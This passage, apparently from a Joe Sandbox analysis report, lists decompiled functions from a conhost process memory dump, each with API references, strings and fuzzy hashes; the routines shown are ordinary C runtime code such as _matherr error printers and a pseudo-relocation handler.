                        0x7ff6935e6acf
                        0x7ff6935e6ad8
                        0x7ff6935e6adf
                        0x7ff6935e6af8
                        0x7ff6935e6b00
                        0x7ff6935e6b0a
                        0x7ff6935e6b23

                        APIs
                        Strings
                        Memory Dump Source
                        • Source File: 0000003A.00000002.593746388.00007FF6935C1000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FF6935C0000, based on PE: true
                        • Associated: 0000003A.00000002.593727394.00007FF6935C0000.00000002.00000001.01000000.00000000.sdmpDownload File
                        • Associated: 0000003A.00000002.593942699.00007FF6935F2000.00000004.00000001.01000000.00000000.sdmpDownload File
                        • Associated: 0000003A.00000002.593986329.00007FF6935F5000.00000002.00000001.01000000.00000000.sdmpDownload File
                        • Associated: 0000003A.00000002.594040400.00007FF693602000.00000004.00000001.01000000.00000000.sdmpDownload File
                        • Associated: 0000003A.00000002.594074676.00007FF693604000.00000008.00000001.01000000.00000000.sdmpDownload File
                        • Associated: 0000003A.00000002.594088711.00007FF693607000.00000008.00000001.01000000.00000000.sdmpDownload File
                        • Associated: 0000003A.00000002.594115551.00007FF693608000.00000002.00000001.01000000.00000000.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_58_2_7ff6935c0000_conhost.jbxd
                        Similarity
                        • API ID: memcpy
                        • String ID: basic_string::assign
                        • API String ID: 3510742995-2385367300
                        • Opcode ID: 856f75fc5ca83df3da44a5b8362bbd4a17e1b56cf5a9c7ea2e976db9670b7be0
                        • Instruction ID: 048598bbd70d937f70f7c0687cc56f5b73c8173fa234b21c365254a1c964ac69
                        • Opcode Fuzzy Hash: 856f75fc5ca83df3da44a5b8362bbd4a17e1b56cf5a9c7ea2e976db9670b7be0
                        • Instruction Fuzzy Hash: AF31D766B0978590ED318A1690561BD375DFB4EBD4F8841B2DE1DE7391DE3CE444C300
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 00007FF6935E0B60 Relevance: 6.1, APIs: 4, Instructions: 92COMMON
                        Download Yara Rule
                        APIs
                        Memory Dump Source
                        • Source File: 0000003A.00000002.593746388.00007FF6935C1000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FF6935C0000, based on PE: true
                        • Associated: 0000003A.00000002.593727394.00007FF6935C0000.00000002.00000001.01000000.00000000.sdmpDownload File
                        • Associated: 0000003A.00000002.593942699.00007FF6935F2000.00000004.00000001.01000000.00000000.sdmpDownload File
                        • Associated: 0000003A.00000002.593986329.00007FF6935F5000.00000002.00000001.01000000.00000000.sdmpDownload File
                        • Associated: 0000003A.00000002.594040400.00007FF693602000.00000004.00000001.01000000.00000000.sdmpDownload File
                        • Associated: 0000003A.00000002.594074676.00007FF693604000.00000008.00000001.01000000.00000000.sdmpDownload File
                        • Associated: 0000003A.00000002.594088711.00007FF693607000.00000008.00000001.01000000.00000000.sdmpDownload File
                        • Associated: 0000003A.00000002.594115551.00007FF693608000.00000002.00000001.01000000.00000000.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_58_2_7ff6935c0000_conhost.jbxd
                        Similarity
                        • API ID: Byte$CharLeadMultiWide
                        • String ID:
                        • API String ID: 2561704868-0
                        • Opcode ID: 97542c9c3cd801cb2bd8e2f7732b0a55e2480517176c6dad79208a12f68a136a
                        • Instruction ID: d192f7a487ac7ead8e7283d9d8a6c86a118e924cade88b8766baae82c59f72ff
                        • Opcode Fuzzy Hash: 97542c9c3cd801cb2bd8e2f7732b0a55e2480517176c6dad79208a12f68a136a
                        • Instruction Fuzzy Hash: 6031A072A0C39187E3718B26A40137EA6A8FB89794F5481B5DA9CE77D4DE3DD485CB00
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 00007FF6935D3220 Relevance: 6.0, APIs: 4, Instructions: 48COMMON
                        Download Yara Rule
                        APIs
                        Memory Dump Source
                        • Source File: 0000003A.00000002.593746388.00007FF6935C1000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FF6935C0000, based on PE: true
                        • Associated: 0000003A.00000002.593727394.00007FF6935C0000.00000002.00000001.01000000.00000000.sdmpDownload File
                        • Associated: 0000003A.00000002.593942699.00007FF6935F2000.00000004.00000001.01000000.00000000.sdmpDownload File
                        • Associated: 0000003A.00000002.593986329.00007FF6935F5000.00000002.00000001.01000000.00000000.sdmpDownload File
                        • Associated: 0000003A.00000002.594040400.00007FF693602000.00000004.00000001.01000000.00000000.sdmpDownload File
                        • Associated: 0000003A.00000002.594074676.00007FF693604000.00000008.00000001.01000000.00000000.sdmpDownload File
                        • Associated: 0000003A.00000002.594088711.00007FF693607000.00000008.00000001.01000000.00000000.sdmpDownload File
                        • Associated: 0000003A.00000002.594115551.00007FF693608000.00000002.00000001.01000000.00000000.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_58_2_7ff6935c0000_conhost.jbxd
                        Similarity
                        • API ID: Process$AffinityCurrentMask
                        • String ID:
                        • API String ID: 1231390398-0
                        • Opcode ID: 07c7179b43d0592de7484b18f1b51ab46a10ad95102211386bea1b6cc3319305
                        • Instruction ID: b6532499d3ed797bcfd3d51eb4f8a872746578cd674fe185ce2196734c445d16
                        • Opcode Fuzzy Hash: 07c7179b43d0592de7484b18f1b51ab46a10ad95102211386bea1b6cc3319305
                        • Instruction Fuzzy Hash: DB01F232F0860682FE718B66790236B6798FB4878CF84247ACE9DA3390EE7CD545D200
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 00007FF6935CDBF0 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 183memoryCOMMON
                        Download Yara Rule
                        C-Code - Quality: 100%
                        			E00007FF67FF6935CDBF0(void* __eax) {
				intOrPtr _t4;

				_t4 =  *0x936020e0; // 0x1
				if (_t4 == 0) goto 0x935cdc20;
				return __eax;
			}




                        0x7ff6935cdc05
                        0x7ff6935cdc0d
                        0x7ff6935cdc1f

                        APIs
                        • VirtualProtect.KERNEL32(00007FF693602088,00007FF898063CA0,?,?,?,00000001,00007FF6935C1261), ref: 00007FF6935CDD95
                        Strings
                        Memory Dump Source
                        • Source File: 0000003A.00000002.593746388.00007FF6935C1000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FF6935C0000, based on PE: true
                        • Associated: 0000003A.00000002.593727394.00007FF6935C0000.00000002.00000001.01000000.00000000.sdmpDownload File
                        • Associated: 0000003A.00000002.593942699.00007FF6935F2000.00000004.00000001.01000000.00000000.sdmpDownload File
                        • Associated: 0000003A.00000002.593986329.00007FF6935F5000.00000002.00000001.01000000.00000000.sdmpDownload File
                        • Associated: 0000003A.00000002.594040400.00007FF693602000.00000004.00000001.01000000.00000000.sdmpDownload File
                        • Associated: 0000003A.00000002.594074676.00007FF693604000.00000008.00000001.01000000.00000000.sdmpDownload File
                        • Associated: 0000003A.00000002.594088711.00007FF693607000.00000008.00000001.01000000.00000000.sdmpDownload File
                        • Associated: 0000003A.00000002.594115551.00007FF693608000.00000002.00000001.01000000.00000000.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_58_2_7ff6935c0000_conhost.jbxd
                        Similarity
                        • API ID: ProtectVirtual
                        • String ID: Unknown pseudo relocation bit size %d.$ Unknown pseudo relocation protocol version %d.
                        • API String ID: 544645111-395989641
                        • Opcode ID: 160a7bcd44ab8e345359b609eeef81b9a2a48149748fc7b3b198939d920f03e9
                        • Instruction ID: 7e6a16805f54671d06ed856514a30ef1ae3a8ea21e3fd5ae27b107d4eb10cf65
                        • Opcode Fuzzy Hash: 160a7bcd44ab8e345359b609eeef81b9a2a48149748fc7b3b198939d920f03e9
                        • Instruction Fuzzy Hash: DA61C272F0864286EE309F15A842279B7E9FF59B98F048271DE5EE7394DE3CE441D600
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 00007FF6935D04D0 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 134COMMON
                        Download Yara Rule
                        C-Code - Quality: 69%
                        			E00007FF67FF6935D04D0(void* __rcx) {
				void* _t29;
				intOrPtr _t39;
				intOrPtr _t52;
				intOrPtr _t53;
				intOrPtr _t55;
				intOrPtr _t56;
				intOrPtr _t57;
				intOrPtr _t59;
				intOrPtr _t60;
				intOrPtr _t64;
				void* _t68;
				void* _t76;
				intOrPtr* _t80;
				intOrPtr* _t81;
				intOrPtr* _t82;
				void* _t89;

				if (__rcx == 0) goto 0x935d06d0;
				_t80 =  *0x935f8900; // 0x7ff6936023e0
				_t52 =  *_t80;
				if (_t52 == 0) goto 0x935d05b8;
				if ( *((long long*)(_t52 + 0x90)) != 0) goto 0x935d05e0;
				 *((long long*)(_t52 + 0x90)) = 0x935f3fa0;
				E00007FF67FF6935D7BF0(0x935f3fa0, _t76);
				_t53 =  *_t80;
				if (_t53 == 0) goto 0x935d05f8;
				if ( *((long long*)(_t53 + 0x88)) == 0) goto 0x935d0620;
				_t55 =  *((intOrPtr*)( *((intOrPtr*)(_t53 + 0x88))));
				if (__rcx == _t55) goto 0x935d0708;
				if (_t55 == 0) goto 0x935d0708;
				_t56 =  *((intOrPtr*)(_t55 + 0x18));
				if (_t56 == 0) goto 0x935d06e0;
				if (__rcx != _t56) goto 0x935d0550;
				_t39 = _t56;
				if (_t39 == 0) goto 0x935d06e0;
				 *((intOrPtr*)(__rcx + 0x10)) =  *((intOrPtr*)(__rcx + 0x10)) - 1;
				if (_t39 == 0) goto 0x935d0678;
				_t57 =  *_t80;
				if (_t57 == 0) goto 0x935d0640;
				if ( *((long long*)(_t57 + 0x90)) == 0) goto 0x935d0659;
				if (_t57 == 0) goto 0x935d070f;
				_pop(_t81);
				goto E00007FF67FF6935D7C30;
				E00007FF67FF6935D6420();
				if ( *((long long*)(_t57 + 0x90)) == 0) goto 0x935d0505;
				if ( *_t81 != 0) goto 0x935d05e0;
				E00007FF67FF6935D6420();
				E00007FF67FF6935D7BF0( *((intOrPtr*)( *_t81 + 0x90)), _t76);
				_t59 =  *_t81;
				if (_t59 != 0) goto 0x935d0524;
				E00007FF67FF6935D6420();
				_t60 =  *_t81;
				if ( *((long long*)(_t59 + 0x88)) == 0) goto 0x935d0620;
				if (_t60 != 0) goto 0x935d0532;
				E00007FF67FF6935D6420();
				goto 0x935d0532;
				 *((long long*)(_t60 + 0x88)) = 0x93602368;
				goto 0x935d0539;
				asm("o16 nop [cs:eax+eax]");
				E00007FF67FF6935D6420();
				if ( *0x7FF6936023F8 != 0) goto 0x935d0594;
				 *((long long*)( *_t81 + 0x90)) = 0x935f3fa0;
				_pop(_t68);
				_pop(_t82);
				_pop(_t89);
				goto E00007FF67FF6935D7C30;
				_t16 = _t89 + 8; // 0x8
				_t29 = E00007FF67FF6935CFD90(_t16);
				if (_t68 == 0) goto 0x935d069d;
				 *((long long*)(_t68 + 0x18)) =  *((intOrPtr*)(_t89 + 0x18));
				free(??);
				goto 0x935d057a;
				_t64 =  *_t82;
				if (_t64 == 0) goto 0x935d0719;
				if ( *((long long*)(_t64 + 0x88)) != 0) goto 0x935d0738;
				 *((long long*)(_t64 + 0x88)) = 0x93602368;
				 *0x93602368 =  *((intOrPtr*)(_t89 + 0x18));
				goto 0x935d0690;
				return _t29;
			}



















                        0x7ff6935d04de
                        0x7ff6935d04e4
                        0x7ff6935d04eb
                        0x7ff6935d04f1
                        0x7ff6935d04ff
                        0x7ff6935d050c
                        0x7ff6935d0513
                        0x7ff6935d0518
                        0x7ff6935d051e
                        0x7ff6935d052c
                        0x7ff6935d0539
                        0x7ff6935d053f
                        0x7ff6935d0548
                        0x7ff6935d0553
                        0x7ff6935d055a
                        0x7ff6935d0563
                        0x7ff6935d0565
                        0x7ff6935d0568
                        0x7ff6935d056e
                        0x7ff6935d0574
                        0x7ff6935d057a
                        0x7ff6935d0580
                        0x7ff6935d058e
                        0x7ff6935d0597
                        0x7ff6935d05a9
                        0x7ff6935d05ac
                        0x7ff6935d05b8
                        0x7ff6935d05c8
                        0x7ff6935d05d1
                        0x7ff6935d05d3
                        0x7ff6935d05e7
                        0x7ff6935d05ec
                        0x7ff6935d05f2
                        0x7ff6935d05f8
                        0x7ff6935d0605
                        0x7ff6935d0608
                        0x7ff6935d060d
                        0x7ff6935d0613
                        0x7ff6935d0618
                        0x7ff6935d0627
                        0x7ff6935d0631
                        0x7ff6935d0636
                        0x7ff6935d0640
                        0x7ff6935d0653
                        0x7ff6935d0660
                        0x7ff6935d066b
                        0x7ff6935d066c
                        0x7ff6935d066d
                        0x7ff6935d066f
                        0x7ff6935d0678
                        0x7ff6935d067d
                        0x7ff6935d0685
                        0x7ff6935d068c
                        0x7ff6935d0693
                        0x7ff6935d0698
                        0x7ff6935d069d
                        0x7ff6935d06a3
                        0x7ff6935d06ad
                        0x7ff6935d06ba
                        0x7ff6935d06c9
                        0x7ff6935d06cc
                        0x7ff6935d06d8

                        Strings
                        Memory Dump Source
                        • Source File: 0000003A.00000002.593746388.00007FF6935C1000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FF6935C0000, based on PE: true
                        • Associated: 0000003A.00000002.593727394.00007FF6935C0000.00000002.00000001.01000000.00000000.sdmpDownload File
                        • Associated: 0000003A.00000002.593942699.00007FF6935F2000.00000004.00000001.01000000.00000000.sdmpDownload File
                        • Associated: 0000003A.00000002.593986329.00007FF6935F5000.00000002.00000001.01000000.00000000.sdmpDownload File
                        • Associated: 0000003A.00000002.594040400.00007FF693602000.00000004.00000001.01000000.00000000.sdmpDownload File
                        • Associated: 0000003A.00000002.594074676.00007FF693604000.00000008.00000001.01000000.00000000.sdmpDownload File
                        • Associated: 0000003A.00000002.594088711.00007FF693607000.00000008.00000001.01000000.00000000.sdmpDownload File
                        • Associated: 0000003A.00000002.594115551.00007FF693608000.00000002.00000001.01000000.00000000.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_58_2_7ff6935c0000_conhost.jbxd
                        Similarity
                        • API ID:
                        • String ID: %p not found?!?!
                        • API String ID: 0-11085004
                        • Opcode ID: f9b0a023d8ebbd3b6d1e600de84940c716e490ad227e1eb3e13a8f0b82d54ee9
                        • Instruction ID: 1b33515590443cef95a5865963a15b7a0880830b07c653297c653e4834309683
                        • Opcode Fuzzy Hash: f9b0a023d8ebbd3b6d1e600de84940c716e490ad227e1eb3e13a8f0b82d54ee9
                        • Instruction Fuzzy Hash: 4D512E62A0A74685FEB49B55E0473B916D8EF4CB84F5880B7CE6CA7391DF3CA484D350
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 00007FF6935CD8F0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 38COMMON
                        Download Yara Rule
                        C-Code - Quality: 25%
                        			E00007FF67FF6935CD8F0() {
				intOrPtr* _t8;

				asm("movaps [esp+0x40], xmm6");
				asm("movaps [esp+0x50], xmm7");
				asm("inc esp");
				if ( *_t8 - 6 > 0) goto 0x935cd9dc;
				goto __rax;
			}




                        0x7ff6935cd8f6
                        0x7ff6935cd8fb
                        0x7ff6935cd900
                        0x7ff6935cd909
                        0x7ff6935cd91f

                        APIs
                        Strings
                        Memory Dump Source
                        • Source File: 0000003A.00000002.593746388.00007FF6935C1000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FF6935C0000, based on PE: true
                        • Associated: 0000003A.00000002.593727394.00007FF6935C0000.00000002.00000001.01000000.00000000.sdmpDownload File
                        • Associated: 0000003A.00000002.593942699.00007FF6935F2000.00000004.00000001.01000000.00000000.sdmpDownload File
                        • Associated: 0000003A.00000002.593986329.00007FF6935F5000.00000002.00000001.01000000.00000000.sdmpDownload File
                        • Associated: 0000003A.00000002.594040400.00007FF693602000.00000004.00000001.01000000.00000000.sdmpDownload File
                        • Associated: 0000003A.00000002.594074676.00007FF693604000.00000008.00000001.01000000.00000000.sdmpDownload File
                        • Associated: 0000003A.00000002.594088711.00007FF693607000.00000008.00000001.01000000.00000000.sdmpDownload File
                        • Associated: 0000003A.00000002.594115551.00007FF693608000.00000002.00000001.01000000.00000000.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_58_2_7ff6935c0000_conhost.jbxd
                        Similarity
                        • API ID: fprintf
                        • String ID: Unknown error$_matherr(): %s in %s(%g, %g) (retval=%g)
                        • API String ID: 383729395-3474627141
                        • Opcode ID: ead7636b54ddbd59f9053092febdb081bf77f8f585780227d6b686ddc5ad08ec
                        • Instruction ID: aa79a6bbc1a5e28f6c9b0b98b739f8224b1d07a9e42de5ca27ebeaeb32df3055
                        • Opcode Fuzzy Hash: ead7636b54ddbd59f9053092febdb081bf77f8f585780227d6b686ddc5ad08ec
                        • Instruction Fuzzy Hash: 8F01A922908E88C6D7228F1CD4021FA7374FF5D799F145361EE8C66260DF29D653C700
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 00007FF6935CD9A0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 25COMMON
                        Download Yara Rule
                        C-Code - Quality: 100%
                        			E00007FF67FF6935CD9A0() {

				goto 0x935cd92f;
				goto 0x935cd92f;
				0;
				return 0;
			}



                        0x7ff6935cd9d7
                        0x7ff6935cd9e3
                        0x7ff6935cd9ee
                        0x7ff6935cd9f2

                        APIs
                        Strings
                        Memory Dump Source
                        • Source File: 0000003A.00000002.593746388.00007FF6935C1000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FF6935C0000, based on PE: true
                        • Associated: 0000003A.00000002.593727394.00007FF6935C0000.00000002.00000001.01000000.00000000.sdmpDownload File
                        • Associated: 0000003A.00000002.593942699.00007FF6935F2000.00000004.00000001.01000000.00000000.sdmpDownload File
                        • Associated: 0000003A.00000002.593986329.00007FF6935F5000.00000002.00000001.01000000.00000000.sdmpDownload File
                        • Associated: 0000003A.00000002.594040400.00007FF693602000.00000004.00000001.01000000.00000000.sdmpDownload File
                        • Associated: 0000003A.00000002.594074676.00007FF693604000.00000008.00000001.01000000.00000000.sdmpDownload File
                        • Associated: 0000003A.00000002.594088711.00007FF693607000.00000008.00000001.01000000.00000000.sdmpDownload File
                        • Associated: 0000003A.00000002.594115551.00007FF693608000.00000002.00000001.01000000.00000000.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_58_2_7ff6935c0000_conhost.jbxd
                        Similarity
                        • API ID: fprintf
                        • String ID: Partial loss of significance (PLOSS)$_matherr(): %s in %s(%g, %g) (retval=%g)
                        • API String ID: 383729395-4283191376
                        • Opcode ID: 6b9d22e89ef62e5b9bced506d89313fe1f9619b9d719c2e793115f3f4dd466b7
                        • Instruction ID: c3ab4d96c77084fd35db9446f1228747fab29210eb946169661fa1a6d81031ee
                        • Opcode Fuzzy Hash: 6b9d22e89ef62e5b9bced506d89313fe1f9619b9d719c2e793115f3f4dd466b7
                        • Instruction Fuzzy Hash: 33F06212908F8882D6228F1DA4011FBB374FF4E789F245365EE8D76565DF29D6439700
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 00007FF6935CD9B0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 25COMMON
                        Download Yara Rule
                        C-Code - Quality: 100%
                        			E00007FF67FF6935CD9B0() {

				goto 0x935cd92f;
				goto 0x935cd92f;
				0;
				return 0;
			}



                        0x7ff6935cd9d7
                        0x7ff6935cd9e3
                        0x7ff6935cd9ee
                        0x7ff6935cd9f2

                        APIs
                        Strings
                        Memory Dump Source
                        • Source File: 0000003A.00000002.593746388.00007FF6935C1000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FF6935C0000, based on PE: true
                        • Associated: 0000003A.00000002.593727394.00007FF6935C0000.00000002.00000001.01000000.00000000.sdmpDownload File
                        • Associated: 0000003A.00000002.593942699.00007FF6935F2000.00000004.00000001.01000000.00000000.sdmpDownload File
                        • Associated: 0000003A.00000002.593986329.00007FF6935F5000.00000002.00000001.01000000.00000000.sdmpDownload File
                        • Associated: 0000003A.00000002.594040400.00007FF693602000.00000004.00000001.01000000.00000000.sdmpDownload File
                        • Associated: 0000003A.00000002.594074676.00007FF693604000.00000008.00000001.01000000.00000000.sdmpDownload File
                        • Associated: 0000003A.00000002.594088711.00007FF693607000.00000008.00000001.01000000.00000000.sdmpDownload File
                        • Associated: 0000003A.00000002.594115551.00007FF693608000.00000002.00000001.01000000.00000000.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_58_2_7ff6935c0000_conhost.jbxd
                        Similarity
                        • API ID: fprintf
                        • String ID: Overflow range error (OVERFLOW)$_matherr(): %s in %s(%g, %g) (retval=%g)
                        • API String ID: 383729395-4064033741
                        • Opcode ID: 77bbad40f6391f2e6a681b0a3f36d2ede68e4baed7b37ba4d846b16477b37413
                        • Instruction ID: 8cc9efba11acdafe5f96e450c140e1de1912d9a77ca8c5f5769ec410cfa298c7
                        • Opcode Fuzzy Hash: 77bbad40f6391f2e6a681b0a3f36d2ede68e4baed7b37ba4d846b16477b37413
                        • Instruction Fuzzy Hash: F4F06212908F8882D6228F1DA4011FBB374FF4E789F245365EE8D76565DF29D6439700
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 00007FF6935CD990 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 25COMMON
                        Download Yara Rule
                        C-Code - Quality: 100%
                        			E00007FF67FF6935CD990() {

				goto 0x935cd92f;
				goto 0x935cd92f;
				0;
				return 0;
			}



                        0x7ff6935cd9d7
                        0x7ff6935cd9e3
                        0x7ff6935cd9ee
                        0x7ff6935cd9f2

                        APIs
                        Strings
                        Memory Dump Source
                        • Source File: 0000003A.00000002.593746388.00007FF6935C1000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FF6935C0000, based on PE: true
                        • Associated: 0000003A.00000002.593727394.00007FF6935C0000.00000002.00000001.01000000.00000000.sdmpDownload File
                        • Associated: 0000003A.00000002.593942699.00007FF6935F2000.00000004.00000001.01000000.00000000.sdmpDownload File
                        • Associated: 0000003A.00000002.593986329.00007FF6935F5000.00000002.00000001.01000000.00000000.sdmpDownload File
                        • Associated: 0000003A.00000002.594040400.00007FF693602000.00000004.00000001.01000000.00000000.sdmpDownload File
                        • Associated: 0000003A.00000002.594074676.00007FF693604000.00000008.00000001.01000000.00000000.sdmpDownload File
                        • Associated: 0000003A.00000002.594088711.00007FF693607000.00000008.00000001.01000000.00000000.sdmpDownload File
                        • Associated: 0000003A.00000002.594115551.00007FF693608000.00000002.00000001.01000000.00000000.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_58_2_7ff6935c0000_conhost.jbxd
                        Similarity
                        • API ID: fprintf
                        • String ID: Argument domain error (DOMAIN)$_matherr(): %s in %s(%g, %g) (retval=%g)
                        • API String ID: 383729395-2713391170
                        • Opcode ID: dfa6636e9e375e9907b63d44577e77ac3a01813be521a962a8958fce02d8cdd2
                        • Instruction ID: 2b0b29b763f52d5ae004d50b27c1abb554d7e01299aeff725b7865edc95acc16
                        • Opcode Fuzzy Hash: dfa6636e9e375e9907b63d44577e77ac3a01813be521a962a8958fce02d8cdd2
                        • Instruction Fuzzy Hash: ACF0C212808F8882D2228F1CA4011FBB374FF4E789F241325EE8D76124DF28D6438300
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 00007FF6935CD9C0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 25COMMON
                        Download Yara Rule
                        C-Code - Quality: 100%
                        			E00007FF67FF6935CD9C0() {

				goto 0x935cd92f;
				goto 0x935cd92f;
				0;
				return 0;
			}



                        0x7ff6935cd9d7
                        0x7ff6935cd9e3
                        0x7ff6935cd9ee
                        0x7ff6935cd9f2

                        APIs
                        Strings
                        Memory Dump Source
                        • Source File: 0000003A.00000002.593746388.00007FF6935C1000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FF6935C0000, based on PE: true
                        • Associated: 0000003A.00000002.593727394.00007FF6935C0000.00000002.00000001.01000000.00000000.sdmpDownload File
                        • Associated: 0000003A.00000002.593942699.00007FF6935F2000.00000004.00000001.01000000.00000000.sdmpDownload File
                        • Associated: 0000003A.00000002.593986329.00007FF6935F5000.00000002.00000001.01000000.00000000.sdmpDownload File
                        • Associated: 0000003A.00000002.594040400.00007FF693602000.00000004.00000001.01000000.00000000.sdmpDownload File
                        • Associated: 0000003A.00000002.594074676.00007FF693604000.00000008.00000001.01000000.00000000.sdmpDownload File
                        • Associated: 0000003A.00000002.594088711.00007FF693607000.00000008.00000001.01000000.00000000.sdmpDownload File
                        • Associated: 0000003A.00000002.594115551.00007FF693608000.00000002.00000001.01000000.00000000.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_58_2_7ff6935c0000_conhost.jbxd
                        Similarity
                        • API ID: fprintf
                        • String ID: The result is too small to be represented (UNDERFLOW)$_matherr(): %s in %s(%g, %g) (retval=%g)
                        • API String ID: 383729395-2187435201
                        • Opcode ID: 0a74dce8a9c2b7b79bd101453fbaac9d5a59d0f9eb2170a15fc9583b150580f8
                        • Instruction ID: bc1b5700f547ee9508bd344d6c6b7578da799f069b4df9c8b3ccd9a469dc694b
                        • Opcode Fuzzy Hash: 0a74dce8a9c2b7b79bd101453fbaac9d5a59d0f9eb2170a15fc9583b150580f8
                        • Instruction Fuzzy Hash: 55F06216908F8882D6228F1DA4011FBB374FF4E789F245365EE8D76165DF28D6439700
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 00007FF6935CD9D0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 25COMMON
                        Download Yara Rule
                        C-Code - Quality: 100%
                        			E00007FF67FF6935CD9D0() {

				goto 0x935cd92f;
				goto 0x935cd92f;
				0;
				return 0;
			}



                        0x7ff6935cd9d7
                        0x7ff6935cd9e3
                        0x7ff6935cd9ee
                        0x7ff6935cd9f2

                        APIs
                        Strings
                        Memory Dump Source
                        • Source File: 0000003A.00000002.593746388.00007FF6935C1000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FF6935C0000, based on PE: true
                        • Associated: 0000003A.00000002.593727394.00007FF6935C0000.00000002.00000001.01000000.00000000.sdmpDownload File
                        • Associated: 0000003A.00000002.593942699.00007FF6935F2000.00000004.00000001.01000000.00000000.sdmpDownload File
                        • Associated: 0000003A.00000002.593986329.00007FF6935F5000.00000002.00000001.01000000.00000000.sdmpDownload File
                        • Associated: 0000003A.00000002.594040400.00007FF693602000.00000004.00000001.01000000.00000000.sdmpDownload File
                        • Associated: 0000003A.00000002.594074676.00007FF693604000.00000008.00000001.01000000.00000000.sdmpDownload File
                        • Associated: 0000003A.00000002.594088711.00007FF693607000.00000008.00000001.01000000.00000000.sdmpDownload File
                        • Associated: 0000003A.00000002.594115551.00007FF693608000.00000002.00000001.01000000.00000000.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_58_2_7ff6935c0000_conhost.jbxd
                        Similarity
                        • API ID: fprintf
                        • String ID: Total loss of significance (TLOSS)$_matherr(): %s in %s(%g, %g) (retval=%g)
                        • API String ID: 383729395-4273532761
                        • Opcode ID: fff9744f9680b1120d8ff99d1331c9f72032575e2a1bc6299c96db8431976cac
                        • Instruction ID: b7c65fcb92efd37a80b6a136113bcdd04c6da6169b96ec4b7dfd92021642728d
                        • Opcode Fuzzy Hash: fff9744f9680b1120d8ff99d1331c9f72032575e2a1bc6299c96db8431976cac
                        • Instruction Fuzzy Hash: CDF06212908F8882D6228F1DA4011FBB374FF4E789F255365EE8D76525DF29D6439700
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 00007FF6935CD928 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 24COMMON
                        Download Yara Rule
                        APIs
                        Strings
                        Memory Dump Source
                        • Source File: 0000003A.00000002.593746388.00007FF6935C1000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FF6935C0000, based on PE: true
                        • Associated: 0000003A.00000002.593727394.00007FF6935C0000.00000002.00000001.01000000.00000000.sdmpDownload File
                        • Associated: 0000003A.00000002.593942699.00007FF6935F2000.00000004.00000001.01000000.00000000.sdmpDownload File
                        • Associated: 0000003A.00000002.593986329.00007FF6935F5000.00000002.00000001.01000000.00000000.sdmpDownload File
                        • Associated: 0000003A.00000002.594040400.00007FF693602000.00000004.00000001.01000000.00000000.sdmpDownload File
                        • Associated: 0000003A.00000002.594074676.00007FF693604000.00000008.00000001.01000000.00000000.sdmpDownload File
                        • Associated: 0000003A.00000002.594088711.00007FF693607000.00000008.00000001.01000000.00000000.sdmpDownload File
                        • Associated: 0000003A.00000002.594115551.00007FF693608000.00000002.00000001.01000000.00000000.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_58_2_7ff6935c0000_conhost.jbxd
                        Similarity
                        • API ID: fprintf
                        • String ID: Argument singularity (SIGN)$_matherr(): %s in %s(%g, %g) (retval=%g)
                        • API String ID: 383729395-2468659920
                        • Opcode ID: e91f10d2408dca780daf1f383b8d72a2e3011170a2ec5dc8b131a4848721aced
                        • Instruction ID: 112381ffff77e90f08efafa9d2bbf37bc4b1631184280fe5c812c272f72128d5
                        • Opcode Fuzzy Hash: e91f10d2408dca780daf1f383b8d72a2e3011170a2ec5dc8b131a4848721aced
                        • Instruction Fuzzy Hash: 45F06D22908F8882D2128F2CA4011ABB375FF4EB89F245326EE8C7A125DF28D6438700
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 00007FF6935E01E0 Relevance: 5.1, APIs: 4, Instructions: 125COMMON
                        Download Yara Rule
                        C-Code - Quality: 82%
                        			E00007FF67FF6935E01E0(signed int __edx, void* __eflags, void* __rax, void* __rcx) {
				void* _t6;
				void* _t12;
				void* _t13;
				intOrPtr* _t15;
				void* _t20;
				void* _t21;
				intOrPtr* _t27;
				void* _t32;

				_t21 = __rax;
				if (__eflags != 0) goto 0x935e0338;
